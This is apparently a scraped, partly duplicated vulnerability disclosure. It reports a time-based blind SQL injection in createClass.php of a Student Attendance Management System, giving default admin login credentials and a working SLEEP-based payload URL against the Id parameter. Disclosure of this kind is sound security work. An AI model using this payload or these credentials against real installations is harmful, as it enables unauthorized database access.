SQL injection vulnerability in Student Attendance Management System。input admin@mail.com / Password@123 Log in to the background. Then modify the information in createClass Php, the ID is assigned to the variable $ID, and then inserted into the database for query, and the query information is returned, causing a SQL injection vulnerability
2.sql injectionPOC:
http://127.0.0.1/Admin/createClass.php?action=edit&Id=2' AND (SELECT 5892 FROM (SELECT(SLEEP(5)))cbkc) AND 'Popu'='Popu---
Use sqlmap to verify
Manual verification
SLEEP(5)
SLEEP(8)
The text was updated successfully, but these errors were encountered:
Build environment: Aapche2.4.39; MySQL5.7.26; PHP7.3.4
SQL injection vulnerability in Student Attendance Management System。input admin@mail.com / Password@123 Log in to the background. Then modify the information in createClass Php, the ID is assigned to the variable $ID, and then inserted into the database for query, and the query information is returned, causing a SQL injection vulnerability
2.sql injectionPOC:
http://127.0.0.1/Admin/createClass.php?action=edit&Id=2' AND (SELECT 5892 FROM (SELECT(SLEEP(5)))cbkc) AND 'Popu'='Popu---The text was updated successfully, but these errors were encountered: